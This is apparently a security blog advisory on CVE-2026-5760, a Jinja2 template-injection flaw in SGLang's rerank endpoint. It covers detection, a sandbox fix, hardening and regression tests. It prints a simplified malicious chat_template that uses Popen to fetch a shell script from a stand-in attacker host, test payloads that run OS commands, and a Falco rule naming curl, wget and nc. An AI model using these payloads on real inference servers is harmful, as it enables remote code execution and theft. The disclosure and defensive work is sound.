Vulnerability Analysis

CVE-2026-5760: SGLang GGUF Model RCE — How a Malicious AI Model Can Destroy Your Inference Server

Executive Summary

CVE-2026-5760 is a critical (CVSS 9.8) Server-Side Template Injection (SSTI) vulnerability in SGLang, a widely used open-source inference framework for large language models and multimodal AI models. By embedding a malicious Jinja2 payload inside a GGUF model's tokenizer.chat_template field, an attacker can execute arbitrary Python — and therefore arbitrary OS commands — on the hosting inference server the moment that model is loaded and a request hits the /v1/rerank endpoint. The attack requires no authentication and can be delivered entirely through poisoned models published on platforms like Hugging Face, making this a first-class AI supply chain threat.


1. What Is This Vulnerability?

SGLang is a high-performance, open-source serving framework designed to efficiently serve large language models (LLMs) and multimodal models. It exposes an OpenAI-compatible API surface and supports GGUF — the "GPT-Generated Unified Format" model format popularized by llama.cpp — as a supported model format.

The vulnerability resides in serving_rerank.py, the component responsible for SGLang's reranking endpoint (/v1/rerank). When processing a chat template sourced from an incoming GGUF model, SGLang renders it using the standard, unsandboxed jinja2.Environment() function:

# VULNERABLE CODE (serving_rerank.py — SGLang ≤ 0.5.9)
from jinja2 import Environment

env = Environment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)

The Jinja2 Environment() class, by design, does not restrict access to Python builtins, object attributes, or class hierarchies. This is safe when the template source is trusted, but catastrophically dangerous when it originates from user-supplied content — such as the tokenizer.chat_template field embedded in an untrusted GGUF file.

The correct approach is ImmutableSandboxedEnvironment, which strips access to dangerous Python internals:

# SAFE CODE
from jinja2.sandbox import ImmutableSandboxedEnvironment

env = ImmutableSandboxedEnvironment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)

Attack Vector

An attacker crafts a GGUF model file where tokenizer.chat_template contains a Jinja2 SSTI payload. A trigger phrase — specifically the string "The answer can only be 'yes' or 'no'" — is woven into the template to activate SGLang's internal Qwen3 reranker detection logic, which is the code path that calls the vulnerable template renderer.

A simplified version of the payload looks like this:

{# Malicious tokenizer.chat_template #}
{% if 'The answer can only be \'yes\' or \'no\'' in messages[-1]['content'] %}
{{ ''.__class__.__mro__[1].__subclasses__() 
   | selectattr('__name__', 'equalto', 'Popen') | first 
   | (x -> x(['curl', 'https://attacker.com/shell.sh', '-o', '/tmp/s.sh'], 
             stdout=-1).communicate()) }}
{% endif %}
{{ messages | map(attribute='content') | join('\n') }}

When a victim loads this model and any request arrives at /v1/rerank, SGLang executes the template and the attacker's OS command runs with full inference server privileges.

Real-World Impact

While no confirmed in-the-wild exploitation campaign has been publicly attributed to this CVE as of April 2026, the attack surface is substantial:

  • Thousands of GGUF models are hosted on public repositories such as Hugging Face, many downloaded tens of thousands of times per day.
  • SGLang is used heavily in enterprise AI infrastructure, private AI clouds, and research clusters.
  • A compromised inference server may expose GPU resources, API keys, training data, proprietary model weights, and internal network access.
  • The CERT/CC has issued advisory VU#915947, highlighting the severity of the supply chain risk.

2. Who Is Affected?

Factor Details
Affected software SGLang versions ≤ 0.5.9
Vulnerable component serving_rerank.py (/v1/rerank endpoint)
Trigger condition Loading a GGUF model with a malicious tokenizer.chat_template AND sending a request containing the trigger phrase to /v1/rerank
Attack authentication None required — unauthenticated if /v1/rerank is internet-exposed
Deployment contexts at risk Self-hosted SGLang servers, Kubernetes-based inference clusters, cloud GPU instances, HuggingFace Inference Endpoints using SGLang backends
Model distribution risk Any org downloading GGUF models from unverified Hugging Face repos, model zoos, or community mirrors

You are at risk if:

  • You run SGLang version 0.5.9 or earlier
  • You load GGUF models from public repositories without inspecting their tokenizer.chat_template
  • Your SGLang /v1/rerank endpoint is accessible from the network (even internally)

3. How to Detect It (Testing)

Manual Testing Steps

Step 1 — Verify SGLang version:

pip show sglang | grep Version
# OR
python -c "import sglang; print(sglang.__version__)"

If the version is 0.5.9 or lower, the system is vulnerable.

Step 2 — Inspect GGUF model chat templates: Use the gguf-dump utility (from the gguf Python package) to extract and review embedded templates:

pip install gguf
python -c "
import gguf
reader = gguf.GGUFReader('your_model.gguf')
for field in reader.fields.values():
    if 'chat_template' in field.name:
        print(field.name, bytes(field.parts[-1]).decode('utf-8'))
"

Look for any Jinja2 constructs involving __class__, __mro__, __subclasses__, subprocess, os.system, Popen, eval, exec, or __import__.

Step 3 — Test the vulnerable code path directly: On a sandboxed/isolated server, send a reranking request with the trigger phrase:

curl -X POST http://localhost:30000/v1/rerank \
  -H "Content-Type: application/json" \
  -d '{
    "model": "your-loaded-model",
    "query": "The answer can only be '\''yes'\'' or '\''no'\''",
    "documents": ["test document one", "test document two"]
  }'

Monitor server-side for unexpected subprocess creation or outbound network connections.

Automated Scanning

Tool: Snyk / Snyk CLI

snyk test --all-projects
# Look for: CVE-2026-5760 in sglang dependency tree

Tool: pip-audit

pip install pip-audit
pip-audit
# Expected output for vulnerable installs:
# sglang    0.5.9    CVE-2026-5760    GHSA-XXXX-XXXX

Tool: OSV-Scanner (Google)

osv-scanner --lockfile requirements.txt
# Or scan the full Python environment:
osv-scanner -r /path/to/project

Tool: Trivy (container/image scanning)

trivy image your-sglang-docker-image:tag
# Filter for: CVE-2026-5760

Code Review Checklist

  • Search for from jinja2 import Environment in any file related to model serving or template rendering — unsafe pattern
  • Verify ImmutableSandboxedEnvironment or SandboxedEnvironment is used everywhere Jinja2 renders model-supplied templates
  • Confirm tokenizer.chat_template values are validated or stripped of dangerous constructs before rendering
  • Check that no GGUF model loading path passes raw chat_template fields directly into a Jinja2 render call
  • Audit any /v1/rerank or similar endpoint for input sanitization gaps

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Upgrade SGLang immediately to a version that includes the sandboxed Jinja2 fix (monitor the SGLang GitHub releases for a patched release — as of disclosure, no official patch version was available, making workarounds critical).

  2. Apply the Jinja2 sandbox fix manually if a patched SGLang release is unavailable. Locate serving_rerank.py in your SGLang installation:

    find $(python -c "import sglang; import os; print(os.path.dirname(sglang.__file__))") -name "serving_rerank.py"
    
  3. Replace the unsandboxed Environment:

    # BEFORE (vulnerable)
    from jinja2 import Environment
    env = Environment()
    
    # AFTER (safe)
    from jinja2.sandbox import ImmutableSandboxedEnvironment
    env = ImmutableSandboxedEnvironment()
    
  4. Audit all other Jinja2 usages in the codebase for the same pattern — any Environment() that renders external input is a candidate for the same class of vulnerability.

  5. Restart the SGLang service after applying the patch:

    systemctl restart sglang
    # OR for containerized deployments:
    kubectl rollout restart deployment/sglang-server
    
  6. Rotate credentials and secrets exposed on any inference servers that loaded models from unverified sources, as a precaution against prior exploitation.

Code Fix Example

# serving_rerank.py — BEFORE (CVE-2026-5760 vulnerable)
from jinja2 import Environment

def apply_chat_template(tokenizer, messages):
    env = Environment()  # ← No sandboxing; arbitrary code execution possible
    template = env.from_string(tokenizer.chat_template)
    return template.render(messages=messages)


# serving_rerank.py — AFTER (patched)
from jinja2.sandbox import ImmutableSandboxedEnvironment

def apply_chat_template(tokenizer, messages):
    env = ImmutableSandboxedEnvironment()  # ← Sandboxed; Python builtins blocked
    template = env.from_string(tokenizer.chat_template)
    return template.render(messages=messages)

ImmutableSandboxedEnvironment prevents access to __class__, __mro__, __subclasses__, __builtins__, and all other escape vectors used by SSTI payloads. Any attempt to call these attributes raises a SecurityError and the render fails safely.

Configuration Hardening

Network-level controls (immediate risk reduction):

# Block external access to the reranking endpoint with iptables:
iptables -A INPUT -p tcp --dport 30000 -s 0.0.0.0/0 -j DROP
iptables -A INPUT -p tcp --dport 30000 -s 10.0.0.0/8 -j ACCEPT  # Allow only internal

# OR restrict with nginx reverse proxy:
location /v1/rerank {
    allow 10.0.0.0/8;
    deny all;
    proxy_pass http://localhost:30000;
}

SGLang server startup flags:

# Bind only to localhost to prevent external exposure:
python -m sglang.launch_server \
  --model-path ./your_model.gguf \
  --host 127.0.0.1 \
  --port 30000

Container security (drop capabilities, read-only FS):

# In your Kubernetes pod spec:
securityContext:
  runAsNonRoot: true
  readOnlyRootFilesystem: true
  allowPrivilegeEscalation: false
  capabilities:
    drop: ["ALL"]

5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A: Load a GGUF model with a benign tokenizer.chat_template and confirm /v1/rerank returns correct rankings — no functionality regression.
  • Scenario B: Load a GGUF model with a crafted malicious Jinja2 SSTI payload in tokenizer.chat_template and send the trigger request. Confirm the server returns a SecurityError or HTTP 500/400 without executing any subprocess.
  • Scenario C: Send standard reranking requests with the trigger phrase in the query but with a benign model loaded — confirm no unexpected behavior.

Security Test Cases

Test Case 1: SSTI payload is blocked by sandboxed environment

  • Precondition: Apply Jinja2 ImmutableSandboxedEnvironment fix
  • Steps: Load a model with tokenizer.chat_template = "{{ ''.__class__.__mro__[1].__subclasses__() }}", send a POST to /v1/rerank
  • Expected Result: Server raises jinja2.exceptions.SecurityError: access to attribute '__class__' of 'str' object is unsafe, no code executed

Test Case 2: Outbound connection from exploit payload does not succeed

  • Precondition: Apply fix
  • Steps: Load a model with a curl-based SSTI exfiltration payload; monitor network with tcpdump -i any dst port 443
  • Expected Result: No outbound connections to attacker-controlled hosts

Test Case 3: Normal reranking continues to work

  • Precondition: Apply fix, legitimate model loaded
  • Steps: POST {"query": "cybersecurity", "documents": ["doc1", "doc2"]} to /v1/rerank
  • Expected Result: HTTP 200, valid ranking scores returned

Automated Tests

# test_cve_2026_5760.py — Security regression test
import pytest
from jinja2.sandbox import ImmutableSandboxedEnvironment
from jinja2 import SecurityError

MALICIOUS_TEMPLATES = [
    "{{ ''.__class__.__mro__[1].__subclasses__() }}",
    "{% for x in ().__class__.__base__.__subclasses__() %}{{ x.__name__ }}{% endfor %}",
    "{{ self.__init__.__globals__['__builtins__']['__import__']('os').system('id') }}",
    "{{ lipsum.__globals__['os'].popen('id').read() }}",
]

def test_ssti_payloads_blocked_by_sandbox():
    env = ImmutableSandboxedEnvironment()
    for payload in MALICIOUS_TEMPLATES:
        with pytest.raises(SecurityError):
            template = env.from_string(payload)
            template.render()

def test_legitimate_template_renders_correctly():
    env = ImmutableSandboxedEnvironment()
    template = env.from_string(
        "{% for msg in messages %}{{ msg.role }}: {{ msg.content }}\n{% endfor %}"
    )
    result = template.render(messages=[
        {"role": "user", "content": "Is the sky blue?"},
        {"role": "assistant", "content": "Yes."}
    ])
    assert "user: Is the sky blue?" in result
    assert "assistant: Yes." in result

Run the test suite:

pytest test_cve_2026_5760.py -v

6. Prevention & Hardening

Best Practices

AI Model Supply Chain Controls:

  • Only load GGUF models from organizationally vetted, internal model registries. Mirror approved models internally rather than downloading directly from Hugging Face during production deployments.
  • Implement a model vetting pipeline that extracts and statically analyzes tokenizer.chat_template for dangerous Jinja2 constructs before any model is deployed.
  • Use cryptographic model signing and verify signatures before loading. Tools like sigstore can be adapted for model artifact signing.
  • Apply the "principle of least trust" to all external model assets — treat them like untrusted user input.

Jinja2 Hardening in AI Frameworks:

  • Audit every place in your ML serving infrastructure where Jinja2 renders externally sourced templates. Use ImmutableSandboxedEnvironment universally for any template content that isn't 100% developer-controlled.
  • Add a grep-based CI check to flag unsafe Jinja2 Environment() usage:
    # In CI pipeline:
    grep -rn "jinja2.Environment()" ./src --include="*.py" && echo "FAIL: Unsandboxed Jinja2 found" && exit 1
    

Network Segmentation:

  • Never expose SGLang's API port (default: 30000) directly to the internet or untrusted networks. Place it behind an authenticated API gateway or reverse proxy.
  • Apply egress filtering on inference servers — they should not need to initiate outbound connections to arbitrary internet hosts.

Runtime Isolation:

  • Run inference servers in minimal containers with read-only filesystems and dropped Linux capabilities. Even if RCE occurs, a contained environment dramatically limits blast radius.
  • Use seccomp profiles to restrict the system calls available to the inference process:
    securityContext:
      seccompProfile:
        type: RuntimeDefault
    

Monitoring & Detection

Indicators of Compromise (IoCs):

  • Unexpected subprocess execution from the SGLang process (e.g., curl, wget, bash, sh) — monitor with auditd or eBPF-based tools like Falco
  • Outbound network connections from the inference server to unknown external IPs
  • New files created in /tmp, /dev/shm, or world-writable directories by the SGLang process
  • Unusual CPU/network spikes following GGUF model loads

Falco rule to detect suspicious subprocess spawning:

- rule: SGLang Spawns Shell
  desc: Detects shell or curl execution spawned from an SGLang inference process
  condition: >
    spawned_process and
    proc.pname in (sglang, python3, uvicorn) and
    proc.name in (bash, sh, curl, wget, nc, ncat, python3)
  output: "SGLang spawned suspicious process (proc=%proc.name parent=%proc.pname cmd=%proc.cmdline)"
  priority: CRITICAL

Model load audit logging: Log the SHA-256 hash of every GGUF model loaded and cross-reference against your approved model registry:

import hashlib

def audit_model_load(model_path: str) -> str:
    sha256 = hashlib.sha256()
    with open(model_path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            sha256.update(chunk)
    digest = sha256.hexdigest()
    # Compare against allowlist
    assert digest in APPROVED_MODEL_HASHES, f"Unapproved model hash: {digest}"
    return digest

References

Latest from the blog

See all →